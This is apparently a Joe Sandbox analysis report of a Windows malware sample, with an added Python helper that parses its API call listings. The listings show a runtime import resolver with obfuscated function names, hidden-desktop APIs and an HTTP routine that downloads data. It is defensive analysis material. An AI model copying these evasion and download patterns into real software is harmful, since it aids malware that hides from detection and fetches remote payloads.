                                    • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 00F82A6F
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00F82A76
                                    • GetUserNameA.ADVAPI32(00000000,00000104), ref: 00F82A8A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateNameProcessUser
                                    • String ID:
                                    • API String ID: 1296208442-0
                                    • Opcode ID: de1279d6383a8ed8655e4c1239f392725f35dc3eb088fea79cb003e4c6819f8d
                                    • Instruction ID: 29a3ae6ba50f8b4ce6dc970cbda1c554915e19942acb9239a62aeadd23e09b8d
                                    • Opcode Fuzzy Hash: de1279d6383a8ed8655e4c1239f392725f35dc3eb088fea79cb003e4c6819f8d
                                    • Instruction Fuzzy Hash: 3FF0BB71940208ABD710DF99DD45B9EB7BCF705B21F000126F925D3280D374190487A2

                                    Control-flow Graph (basic blocks: id, address range, APIs called, successor blocks)

                                    • 633: f866e0-f866e7 → 634, 635
                                    • 634: f866ed-f86af9, GetProcAddress * 43 → 635
                                    • 635: f86afe-f86b92, LoadLibraryA * 8 → 636, 637
                                    • 636: f86c08-f86c0f → 638, 639
                                    • 637: f86b94-f86c03, GetProcAddress * 5 → 636
                                    • 638: f86cd2-f86cd9 → 640, 641
                                    • 639: f86c15-f86ccd, GetProcAddress * 8 → 638
                                    • 640: f86cdb-f86d4a, GetProcAddress * 5 → 641
                                    • 641: f86d4f-f86d56 → 642, 643
                                    • 642: f86de9-f86df0 → 644, 645
                                    • 643: f86d5c-f86de4, GetProcAddress * 6 → 642
                                    • 644: f86f10-f86f17 → 646, 647
                                    • 645: f86df6-f86f0b, GetProcAddress * 12 → 644
                                    • 646: f86f19-f86f88, GetProcAddress * 5 → 647
                                    • 647: f86f8d-f86f94 → 648, 649
                                    • 648: f86fc1-f86fc8 → 650, 651
                                    • 649: f86f96-f86fbc, GetProcAddress * 2 → 648
                                    • 650: f86fca-f86ff0, GetProcAddress * 2 → 651
                                    • 651: f86ff5-f86ffc → 652, 653
                                    • 652: f870ed-f870f4 → 654, 655
                                    • 653: f87002-f870e8, GetProcAddress * 10 → 652
                                    • 654: f87152-f87159 → 656, 657
                                    • 655: f870f6-f8714d, GetProcAddress * 4 → 654
                                    • 656: f8715b-f87169, GetProcAddress → 657
                                    • 657: f8716e-f87175 → 658, 659
                                    • 658: f871d3 (no successors)
                                    • 659: f87177-f871ce, GetProcAddress * 4 → 658
                                    APIs
                                    • GetProcAddress.KERNEL32(74DD0000,00A85BD0), ref: 00F866F5
                                    • GetProcAddress.KERNEL32(74DD0000,00A85E10), ref: 00F8670D
                                    • GetProcAddress.KERNEL32(74DD0000,00A996A0), ref: 00F86726
                                    • GetProcAddress.KERNEL32(74DD0000,00A996D0), ref: 00F8673E
                                    • GetProcAddress.KERNEL32(74DD0000,00A99628), ref: 00F86756
                                    • GetProcAddress.KERNEL32(74DD0000,00A99640), ref: 00F8676F
                                    • GetProcAddress.KERNEL32(74DD0000,00A8B748), ref: 00F86787
                                    • GetProcAddress.KERNEL32(74DD0000,00A9D238), ref: 00F8679F
                                    • GetProcAddress.KERNEL32(74DD0000,00A9D418), ref: 00F867B8
                                    • GetProcAddress.KERNEL32(74DD0000,00A9D2F8), ref: 00F867D0
                                    • GetProcAddress.KERNEL32(74DD0000,00A9D208), ref: 00F867E8
                                    • GetProcAddress.KERNEL32(74DD0000,00A85BF0), ref: 00F86801
                                    • GetProcAddress.KERNEL32(74DD0000,00A85C30), ref: 00F86819
                                    • GetProcAddress.KERNEL32(74DD0000,00A85B30), ref: 00F86831
                                    • GetProcAddress.KERNEL32(74DD0000,00A85D30), ref: 00F8684A
                                    • GetProcAddress.KERNEL32(74DD0000,00A9D2E0), ref: 00F86862
                                    • GetProcAddress.KERNEL32(74DD0000,00A9D250), ref: 00F8687A
                                    • GetProcAddress.KERNEL32(74DD0000,00A8B798), ref: 00F86893
                                    • GetProcAddress.KERNEL32(74DD0000,00A85B50), ref: 00F868AB
                                    • GetProcAddress.KERNEL32(74DD0000,00A9D3B8), ref: 00F868C3
                                    • GetProcAddress.KERNEL32(74DD0000,00A9D328), ref: 00F868DC
                                    • GetProcAddress.KERNEL32(74DD0000,00A9D3D0), ref: 00F868F4
                                    • GetProcAddress.KERNEL32(74DD0000,00A9D478), ref: 00F8690C
                                    • GetProcAddress.KERNEL32(74DD0000,00A85B90), ref: 00F86925
                                    • GetProcAddress.KERNEL32(74DD0000,00A9D280), ref: 00F8693D
                                    • GetProcAddress.KERNEL32(74DD0000,00A9D4A8), ref: 00F86955
                                    • GetProcAddress.KERNEL32(74DD0000,00A9D448), ref: 00F8696E
                                    • GetProcAddress.KERNEL32(74DD0000,00A9D298), ref: 00F86986
                                    • GetProcAddress.KERNEL32(74DD0000,00A9D2B0), ref: 00F8699E
                                    • GetProcAddress.KERNEL32(74DD0000,00A9D220), ref: 00F869B7
                                    • GetProcAddress.KERNEL32(74DD0000,00A9D310), ref: 00F869CF
                                    • GetProcAddress.KERNEL32(74DD0000,00A9D268), ref: 00F869E7
                                    • GetProcAddress.KERNEL32(74DD0000,00A9D2C8), ref: 00F86A00
                                    • GetProcAddress.KERNEL32(74DD0000,00A9A3B0), ref: 00F86A18
                                    • GetProcAddress.KERNEL32(74DD0000,00A9D340), ref: 00F86A30
                                    • GetProcAddress.KERNEL32(74DD0000,00A9D430), ref: 00F86A49
                                    • GetProcAddress.KERNEL32(74DD0000,00A85BB0), ref: 00F86A61
                                    • GetProcAddress.KERNEL32(74DD0000,00A9D4F0), ref: 00F86A79
                                    • GetProcAddress.KERNEL32(74DD0000,00A85A70), ref: 00F86A92
                                    • GetProcAddress.KERNEL32(74DD0000,00A9D490), ref: 00F86AAA
                                    • GetProcAddress.KERNEL32(74DD0000,00A9D358), ref: 00F86AC2
                                    • GetProcAddress.KERNEL32(74DD0000,00A85790), ref: 00F86ADB
                                    • GetProcAddress.KERNEL32(74DD0000,00A858D0), ref: 00F86AF3
                                    • LoadLibraryA.KERNEL32(00A9D370,00F8051F), ref: 00F86B05
                                    • LoadLibraryA.KERNEL32(00A9D4D8), ref: 00F86B16
                                    • LoadLibraryA.KERNEL32(00A9D388), ref: 00F86B28
                                    • LoadLibraryA.KERNEL32(00A9D4C0), ref: 00F86B3A
                                    • LoadLibraryA.KERNEL32(00A9D3A0), ref: 00F86B4B
                                    • LoadLibraryA.KERNEL32(00A9D3E8), ref: 00F86B5D
                                    • LoadLibraryA.KERNEL32(00A9D400), ref: 00F86B6F
                                    • LoadLibraryA.KERNEL32(00A9D460), ref: 00F86B80
                                    • GetProcAddress.KERNEL32(75290000,00A857B0), ref: 00F86B9C
                                    • GetProcAddress.KERNEL32(75290000,00A9D598), ref: 00F86BB4
                                    • GetProcAddress.KERNEL32(75290000,00A98FD8), ref: 00F86BCD
                                    • GetProcAddress.KERNEL32(75290000,00A9D568), ref: 00F86BE5
                                    • GetProcAddress.KERNEL32(75290000,00A85830), ref: 00F86BFD
                                    • GetProcAddress.KERNEL32(73440000,00A8B8B0), ref: 00F86C1D
                                    • GetProcAddress.KERNEL32(73440000,00A85870), ref: 00F86C35
                                    • GetProcAddress.KERNEL32(73440000,00A8B9C8), ref: 00F86C4E
                                    • GetProcAddress.KERNEL32(73440000,00A9D640), ref: 00F86C66
                                    • GetProcAddress.KERNEL32(73440000,00A9D5B0), ref: 00F86C7E
                                    • GetProcAddress.KERNEL32(73440000,00A857D0), ref: 00F86C97
                                    • GetProcAddress.KERNEL32(73440000,00A857F0), ref: 00F86CAF
                                    • GetProcAddress.KERNEL32(73440000,00A9D580), ref: 00F86CC7
                                    • GetProcAddress.KERNEL32(752C0000,00A85810), ref: 00F86CE3
                                    • GetProcAddress.KERNEL32(752C0000,00A85850), ref: 00F86CFB
                                    • GetProcAddress.KERNEL32(752C0000,00A9D5C8), ref: 00F86D14
                                    • GetProcAddress.KERNEL32(752C0000,00A9D508), ref: 00F86D2C
                                    • GetProcAddress.KERNEL32(752C0000,00A85930), ref: 00F86D44
                                    • GetProcAddress.KERNEL32(74EC0000,00A8B770), ref: 00F86D64
                                    • GetProcAddress.KERNEL32(74EC0000,00A8B9F0), ref: 00F86D7C
                                    • GetProcAddress.KERNEL32(74EC0000,00A9D628), ref: 00F86D95
                                    • GetProcAddress.KERNEL32(74EC0000,00A856F0), ref: 00F86DAD
                                    • GetProcAddress.KERNEL32(74EC0000,00A85750), ref: 00F86DC5
                                    • GetProcAddress.KERNEL32(74EC0000,00A8B810), ref: 00F86DDE
                                    • GetProcAddress.KERNEL32(75BD0000,00A9D5E0), ref: 00F86DFE
                                    • GetProcAddress.KERNEL32(75BD0000,00A85770), ref: 00F86E16
                                    • GetProcAddress.KERNEL32(75BD0000,00A99018), ref: 00F86E2F
                                    • GetProcAddress.KERNEL32(75BD0000,00A9D5F8), ref: 00F86E47
                                    • GetProcAddress.KERNEL32(75BD0000,00A9D610), ref: 00F86E5F
                                    • GetProcAddress.KERNEL32(75BD0000,00A859D0), ref: 00F86E78
                                    • GetProcAddress.KERNEL32(75BD0000,00A85890), ref: 00F86E90
                                    • GetProcAddress.KERNEL32(75BD0000,00A9D670), ref: 00F86EA8
                                    • GetProcAddress.KERNEL32(75BD0000,00A9D520), ref: 00F86EC1
                                    • GetProcAddress.KERNEL32(75BD0000,CreateDesktopA), ref: 00F86ED7
                                    • GetProcAddress.KERNEL32(75BD0000,OpenDesktopA), ref: 00F86EEE
                                    • GetProcAddress.KERNEL32(75BD0000,CloseDesktop), ref: 00F86F05
                                    • GetProcAddress.KERNEL32(75A70000,00A85A10), ref: 00F86F21
                                    • GetProcAddress.KERNEL32(75A70000,00A9D658), ref: 00F86F39
                                    • GetProcAddress.KERNEL32(75A70000,00A9D538), ref: 00F86F52
                                    • GetProcAddress.KERNEL32(75A70000,00A9D688), ref: 00F86F6A
                                    • GetProcAddress.KERNEL32(75A70000,00A9D6A0), ref: 00F86F82
                                    • GetProcAddress.KERNEL32(75450000,00A85A30), ref: 00F86F9E
                                    • GetProcAddress.KERNEL32(75450000,00A858B0), ref: 00F86FB6
                                    • GetProcAddress.KERNEL32(75DA0000,00A858F0), ref: 00F86FD2
                                    • GetProcAddress.KERNEL32(75DA0000,00A9D550), ref: 00F86FEA
                                    • GetProcAddress.KERNEL32(6F070000,00A856B0), ref: 00F8700A
                                    • GetProcAddress.KERNEL32(6F070000,00A85A50), ref: 00F87022
                                    • GetProcAddress.KERNEL32(6F070000,00A85A90), ref: 00F8703B
                                    • GetProcAddress.KERNEL32(6F070000,00A9D6B8), ref: 00F87053
                                    • GetProcAddress.KERNEL32(6F070000,00A85910), ref: 00F8706B
                                    • GetProcAddress.KERNEL32(6F070000,00A85950), ref: 00F87084
                                    • GetProcAddress.KERNEL32(6F070000,00A859F0), ref: 00F8709C
                                    • GetProcAddress.KERNEL32(6F070000,00A85970), ref: 00F870B4
                                    • GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 00F870CB
                                    • GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 00F870E2
                                    • GetProcAddress.KERNEL32(75AF0000,00A9CF80), ref: 00F870FE
                                    • GetProcAddress.KERNEL32(75AF0000,00A990F8), ref: 00F87116
                                    • GetProcAddress.KERNEL32(75AF0000,00A9D178), ref: 00F8712F
                                    • GetProcAddress.KERNEL32(75AF0000,00A9D100), ref: 00F87147
                                    • GetProcAddress.KERNEL32(75D90000,00A856D0), ref: 00F87163
                                    • GetProcAddress.KERNEL32(6CE70000,00A9D0A0), ref: 00F8717F
                                    • GetProcAddress.KERNEL32(6CE70000,00A85710), ref: 00F87197
                                    • GetProcAddress.KERNEL32(6CE70000,00A9D070), ref: 00F871B0
                                    • GetProcAddress.KERNEL32(6CE70000,00A9D040), ref: 00F871C8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$LibraryLoad
                                    • String ID: CloseDesktop$CreateDesktopA$HttpQueryInfoA$InternetSetOptionA$OpenDesktopA
                                    • API String ID: 2238633743-3468015613
                                    • Opcode ID: 97837dec85125641362fbc84a07040909c8269827117f817dae29e5722e32d11
                                    • Instruction ID: 5c718fee32212fb986f58c1d9854fafe5ee9bf296d682a9115ab3c433ff15896
                                    • Opcode Fuzzy Hash: 97837dec85125641362fbc84a07040909c8269827117f817dae29e5722e32d11
                                    • Instruction Fuzzy Hash: 14624EF56152089FD77CDFA4E888A2637B9F789609318893DE976C334CD734A890DB21
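The resolver record above (function at 0x00F866E0) lists 107 GetProcAddress calls against 13 distinct module handles plus 8 LoadLibraryA calls, and only five of the name arguments are shown as readable strings (CreateDesktopA, OpenDesktopA, CloseDesktop, InternetSetOptionA, HttpQueryInfoA); every other lpProcName argument is printed as a raw address. The script below is an added triage helper, not part of the Joe Sandbox report and not code from the analysed sample: it parses lines in the report's "APIs" format, groups GetProcAddress calls by the module handle passed as first argument, counts how many names are visible as literals versus shown only as a pointer, and derives two heuristic flags. The embedded sample input is a subset of the lines above copied into the script so it runs offline; the flag names and the 0.5 ratio threshold are this example's own assumptions, and treating a pointer-valued name argument as "name not visible in the log" is an inference made here, not something the report itself asserts.

```python
import re
from collections import OrderedDict

# Subset of the "APIs" lines from the resolver record above (function at
# 0x00F866E0), copied from the report so the script runs offline.
REPORT_LINES = """
• GetProcAddress.KERNEL32(74DD0000,00A85BD0), ref: 00F866F5
• GetProcAddress.KERNEL32(74DD0000,00A85E10), ref: 00F8670D
• GetProcAddress.KERNEL32(74DD0000,00A996A0), ref: 00F86726
• LoadLibraryA.KERNEL32(00A9D370,00F8051F), ref: 00F86B05
• LoadLibraryA.KERNEL32(00A9D4D8), ref: 00F86B16
• GetProcAddress.KERNEL32(75290000,00A857B0), ref: 00F86B9C
• GetProcAddress.KERNEL32(75BD0000,00A9D5E0), ref: 00F86DFE
• GetProcAddress.KERNEL32(75BD0000,CreateDesktopA), ref: 00F86ED7
• GetProcAddress.KERNEL32(75BD0000,OpenDesktopA), ref: 00F86EEE
• GetProcAddress.KERNEL32(75BD0000,CloseDesktop), ref: 00F86F05
• GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 00F870CB
• GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 00F870E2
"""

# Line shape: "<api>.<exporting module>(<args>), ref: <call site>". The module
# after the dot is where the API itself lives (KERNEL32), not the module whose
# export is being looked up; that one is the first GetProcAddress argument.
API_LINE = re.compile(
    r"(?P<api>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)
HEX32 = re.compile(r"^[0-9A-Fa-f]{8}$")


def parse_api_lines(text):
    """Return [(api, [args], call_site)] for every line in the report's APIs format."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.search(line)
        if not m:
            continue
        args = [a.strip() for a in m.group("args").split(",") if a.strip()]
        calls.append((m.group("api"), args, int(m.group("ref"), 16)))
    return calls


def summarize_resolver(text):
    """Group GetProcAddress calls by module handle and classify the name argument.

    The report prints lpProcName either as the string itself or as a raw
    32-bit address. This example treats the address form as "name not visible
    in the log"; that is an inference made here, not a statement in the report.
    """
    summary = {"LoadLibraryA": 0, "modules": OrderedDict()}
    for api, args, _call_site in parse_api_lines(text):
        if api == "LoadLibraryA":
            summary["LoadLibraryA"] += 1
        elif api == "GetProcAddress" and len(args) >= 2:
            handle, name = args[0], args[1]
            entry = summary["modules"].setdefault(
                handle, {"total": 0, "literal": [], "hidden": 0}
            )
            entry["total"] += 1
            if HEX32.match(name):
                entry["hidden"] += 1
            else:
                entry["literal"].append(name)
    return summary


def hidden_name_ratio(summary):
    """Fraction of GetProcAddress calls whose name argument is only a pointer."""
    total = sum(m["total"] for m in summary["modules"].values())
    hidden = sum(m["hidden"] for m in summary["modules"].values())
    return hidden / total if total else 0.0


def triage_flags(summary, ratio_threshold=0.5):
    """Heuristic flags; the names and the threshold are this example's assumptions."""
    flags = []
    if summary["LoadLibraryA"] and len(summary["modules"]) > 1:
        flags.append("builds-import-table-at-runtime")
    if hidden_name_ratio(summary) >= ratio_threshold:
        flags.append("api-names-not-visible-as-literals")
    return flags


if __name__ == "__main__":
    s = summarize_resolver(REPORT_LINES)
    for handle, m in s["modules"].items():
        print(f"{handle}: {m['total']} lookups, {m['hidden']} hidden, literal={m['literal']}")
    print("LoadLibraryA calls:", s["LoadLibraryA"])
    print("flags:", triage_flags(s))
```

Run against the full 115-line list above rather than the embedded subset, the same grouping gives the per-module counts that the control-flow graph already hints at (43 lookups on the first handle, then 5, 8, 5, 6, 12, ...), and the literal/pointer split makes the five readable names stand out from the rest, which is the quick check an analyst wants before deciding whether the name strings have to be recovered from a memory dump.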
                                    APIs
                                    • lstrlen.KERNEL32(00F8CFEC), ref: 00F7F1D5
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F7F1F1
                                    • lstrlen.KERNEL32(00F8CFEC), ref: 00F7F1FC
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F7F215
                                    • lstrlen.KERNEL32(00F8CFEC), ref: 00F7F220
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F7F239
                                    • lstrcpy.KERNEL32(00000000,00F94FA0), ref: 00F7F25E
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F7F28C
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F7F2C0
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F7F2F0
                                    • lstrlen.KERNEL32(00A85B10), ref: 00F7F315
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen
                                    • String ID: ERROR
                                    • API String ID: 367037083-2861137601
                                    • Opcode ID: 8ea6ab91b29c56f43c706f3dbf9ca0cef55c1eb4c3756340e248a72828e73f46
                                    • Instruction ID: 8635debaa4cb728896f3553d6a4f4c0a494016db38b3d233d603d1bd55c38170
                                    • Opcode Fuzzy Hash: 8ea6ab91b29c56f43c706f3dbf9ca0cef55c1eb4c3756340e248a72828e73f46
                                    • Instruction Fuzzy Hash: 5BA26A70D016058FDB24DF68C948A5AB7F4BF48324B18C07EE829DB255EB35DC46EB52
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F80013
                                    • lstrlen.KERNEL32(00F8CFEC), ref: 00F800BD
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F800E1
                                    • lstrlen.KERNEL32(00F8CFEC), ref: 00F800EC
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F80110
                                    • lstrlen.KERNEL32(00F8CFEC), ref: 00F8011B
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F8013F
                                    • lstrlen.KERNEL32(00F8CFEC), ref: 00F8015A
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F80189
                                    • lstrlen.KERNEL32(00F8CFEC), ref: 00F80194
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F801C3
                                    • lstrlen.KERNEL32(00F8CFEC), ref: 00F801CE
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F80206
                                    • lstrlen.KERNEL32(00F8CFEC), ref: 00F80250
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F80288
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F8059B
                                    • lstrlen.KERNEL32(00A85C70), ref: 00F805AB
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F805D7
                                    • lstrcat.KERNEL32(00000000,?), ref: 00F805E3
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F8060E
                                    • lstrlen.KERNEL32(00A9E4A8), ref: 00F80625
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F8064C
                                    • lstrcat.KERNEL32(00000000,?), ref: 00F80658
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F80681
                                    • lstrlen.KERNEL32(00A85AF0), ref: 00F80698
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F806C9
                                    • lstrcat.KERNEL32(00000000,?), ref: 00F806D5
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F80706
                                    • lstrcpy.KERNEL32(00000000,00A99098), ref: 00F8074B
                                      • Part of subcall function 00F61530: lstrcpy.KERNEL32(00000000,?), ref: 00F61557
                                      • Part of subcall function 00F61530: lstrcpy.KERNEL32(00000000,?), ref: 00F61579
                                      • Part of subcall function 00F61530: lstrcpy.KERNEL32(00000000,?), ref: 00F6159B
                                      • Part of subcall function 00F61530: lstrcpy.KERNEL32(00000000,?), ref: 00F615FF
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F8077F
                                    • lstrcpy.KERNEL32(00000000,00A9E418), ref: 00F807E7
                                    • lstrcpy.KERNEL32(00000000,00A99288), ref: 00F80858
                                    • lstrcpy.KERNEL32(00000000,fplugins), ref: 00F808CF
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F80928
                                    • lstrcpy.KERNEL32(00000000,00A99108), ref: 00F809F8
                                      • Part of subcall function 00F624E0: lstrcpy.KERNEL32(00000000,?), ref: 00F62528
                                      • Part of subcall function 00F624E0: lstrcpy.KERNEL32(00000000,?), ref: 00F6254E
                                      • Part of subcall function 00F624E0: lstrcpy.KERNEL32(00000000,?), ref: 00F62577
                                    • lstrcpy.KERNEL32(00000000,00A99278), ref: 00F80ACE
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F80B81
                                    • lstrcpy.KERNEL32(00000000,00A99278), ref: 00F80D58
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen$lstrcat
                                    • String ID: fplugins
                                    • API String ID: 2500673778-38756186
                                    • Opcode ID: a1dc26483cf4bcad8d17cd6266096375d79d16b12cd80383ba40b3e95cb023d3
                                    • Instruction ID: 624184b2a314c3eba5788aea8cccee6ba21efa657ff12e9957aa66cf4a5bfdf0
                                    • Opcode Fuzzy Hash: a1dc26483cf4bcad8d17cd6266096375d79d16b12cd80383ba40b3e95cb023d3
                                    • Instruction Fuzzy Hash: C4E27C70A053408FD774EF29C888B9AB7E4BF88324F58856EE44DCB252DB35D846DB52

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 2234 f66c40-f66c64 call f62930 2237 f66c66-f66c6b 2234->2237 2238 f66c75-f66c97 call f64bc0 2234->2238 2237->2238 2239 f66c6d-f66c6f lstrcpy 2237->2239 2242 f66caa-f66cba call f62930 2238->2242 2243 f66c99 2238->2243 2239->2238 2247 f66cbc-f66cc2 lstrcpy 2242->2247 2248 f66cc8-f66cf5 InternetOpenA StrCmpCA 2242->2248 2245 f66ca0-f66ca8 2243->2245 2245->2242 2245->2245 2247->2248 2249 f66cf7 2248->2249 2250 f66cfa-f66cfc 2248->2250 2249->2250 2251 f66d02-f66d22 InternetConnectA 2250->2251 2252 f66ea8-f66ebb call f62930 2250->2252 2253 f66ea1-f66ea2 InternetCloseHandle 2251->2253 2254 f66d28-f66d5d HttpOpenRequestA 2251->2254 2261 f66ebd-f66ebf 2252->2261 2262 f66ec9-f66ee0 call f62a20 * 2 2252->2262 2253->2252 2256 f66e94-f66e9e InternetCloseHandle 2254->2256 2257 f66d63-f66d65 2254->2257 2256->2253 2259 f66d67-f66d77 InternetSetOptionA 2257->2259 2260 f66d7d-f66dad HttpSendRequestA HttpQueryInfoA 2257->2260 2259->2260 2264 f66dd4-f66de4 call f83d90 2260->2264 2265 f66daf-f66dd3 call f871e0 call f62a20 * 2 2260->2265 2261->2262 2266 f66ec1-f66ec3 lstrcpy 2261->2266 2264->2265 2274 f66de6-f66de8 2264->2274 2266->2262 2277 f66dee-f66e07 InternetReadFile 2274->2277 2278 f66e8d-f66e8e InternetCloseHandle 2274->2278 2277->2278 2280 f66e0d 2277->2280 2278->2256 2282 f66e10-f66e15 2280->2282 2282->2278 2283 f66e17-f66e3d call f87310 2282->2283 2286 f66e44-f66e51 call f62930 2283->2286 2287 f66e3f call f62a20 2283->2287 2291 f66e53-f66e57 2286->2291 2292 f66e61-f66e8b call f62a20 InternetReadFile 2286->2292 2287->2286 2291->2292 2293 f66e59-f66e5b lstrcpy 2291->2293 2292->2278 2292->2282 2293->2292
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F66C6F
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F66CC2
                                    • InternetOpenA.WININET(00F8CFEC,00000001,00000000,00000000,00000000), ref: 00F66CD5
                                    • StrCmpCA.SHLWAPI(?,00A9E928), ref: 00F66CED
                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00F66D15
                                    • HttpOpenRequestA.WININET(00000000,GET,?,00A9E2C8,00000000,00000000,-00400100,00000000), ref: 00F66D50
                                    • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00F66D77
                                    • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00F66D86
                                    • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00F66DA5
                                    • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00F66DFF
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F66E5B
                                    • InternetReadFile.WININET(?,00000000,000007CF,?), ref: 00F66E7D
                                    • InternetCloseHandle.WININET(00000000), ref: 00F66E8E
                                    • InternetCloseHandle.WININET(?), ref: 00F66E98
                                    • InternetCloseHandle.WININET(00000000), ref: 00F66EA2
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F66EC3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmp
